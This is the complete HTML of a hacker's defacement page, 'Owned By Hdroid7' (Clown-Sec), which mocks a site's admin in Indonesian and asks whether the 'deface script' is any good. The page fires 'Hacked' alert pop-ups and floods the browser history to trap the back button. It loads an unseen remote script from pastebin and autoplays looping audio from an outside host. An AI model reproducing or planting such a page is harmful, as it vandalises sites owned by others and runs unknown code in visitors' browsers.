<script language="javascript">alert(" Halo uy gimana nih? ");</script>
<script language="javascript">alert(" Sehat gak? klo sehat klik Oke yaa ");</script>
<script language="javascript">alert(" Your system is not save:) ");</script>
<script language="javascript">alert(" Hacked By Hdroid7 ");</script>
<html>
<head>
<script>
(function () {
for(var i = 0; i < 20; i++) {
history.pushState(null, document.title, window.location.href );
}
})(document, window, history);
</script>
<meta property="og:image" content="http://baliforyou.com/x.jpg" />
<meta property="og:image:secure_url" content="http://baliforyou.com/x.jpg" />
<meta property="og:audio" content="http://baliforyou.com/zxmbxe_.mp3" />
<link rel="icon" type="image/png" href="https://i.pinimg.com/originals/5e/b8/11/5eb8114fb8c31c8fb7906129f4ac8896.png" type="image/x-icon"/>
<title>Owned By Hdroid7</title>
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests"> 
<meta name="theme-color" content="black">
<meta http-equiv="Content-Type" content="text/html; charset=Windows-1254"/>
<meta name="description" content="NEVER SURENDER">
<meta name="author" content="C0R3X, Clown-Sec"/>
<meta name="keywords" content="C0R3X, Clown-Sec"/>
<meta name="googlebot" content="all"/>
<meta name="robots" content="all" />
<meta name="googlebot-news" content="all" />
<meta name="google" content="notranslate"/>
<meta name="og:title" content="Owned by Hdroid7 >||< Clown-Sec"/>
<meta property="og:type" content="website" />
<meta property="og:updated_time" content="1440432930" />
</span>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script type="text/javascript" src="https://pastebin.com/raw/ynL2hpMe"></script>
</head>
<style type="text/css">
@import url("//fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap");
body{
  	 overflow:hidden;
  	 display: flex;
  	 align-items: center;
  	 justify-content: center;
  	 margin:0;
  	 padding:0;
  	 width:100%;
  	 background-color:#000;
  	 }
i{
margin:10px;
}
a:link{
color:#000;
}
h1{
	color: #000;
	text-decoration: none;
	border-radius:0px;
	border:0px;
	font-family: 'Shadows Into Light', cursive;
	font-size:50px;
	margin:0px;
	padding:0px;
	animation:lamerkaratan 0.1s linear infinite;
}
pre{
color:white;
}
marquee{
width:100%;
}
@keyframes lamerkaratan{
2%{color:#fff;}
3%{transform:translate(2px,-10px) skewX(3240deg);}
5%{transform:translate(0px,0px) skewX(0deg);}
2% , 54%{transform:translateX(0px) skew(0deg);}
55%{transform:translate(-2px,6px) skew(-5530deg);}
56%{transform:translate(0px,0px) skew(0deg);}
57%{transform:translate(4px,-10px) skew(-70deg);}
58%{transform:translate(0px,0px) skew(0deg);}
62%{transform:translate(0px,20px) skew(0deg);}
63%{transform:translate(4px,-2px) skew(0deg);}
90%{transform:translate(1px,3px); skew(-230deg);}
95%{transform:translate(-7px,2px); skew(-120deg);}
100%{transform:translate(0px,0px) skew(0deg);}
</style>
<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false">
<embed src="http://baliforyou.com/zxmbxe_.mp3" type="audio/mpeg" autostart="true" loop="true" height="0" width="0">
<center>
<img title="Pixy-Sec" class="picture" src="https://s.kaskus.id/images/2012/12/26/4383391_20121226011159.gif"/>
<br><h1><font color="red">Owned by</font> Hdroid7</h1><br>
<br><center>
	<font face="courier new" size="10" color="lime">Banyak yang meminta dihargai,
Tapi lupa caranya untuk menghargai</font></center>
<marquee direction="scroll"><pre><font color="red">Hdroid7</font> - Halo Admin Gimana nih bagus gak Script Deface ku -</pre></marquee><br>
<pre id="Clock" style="font-size:38px;font-family:iceland;color:#ff0000;margin:0;"></pre>
</center>
</body>
</html>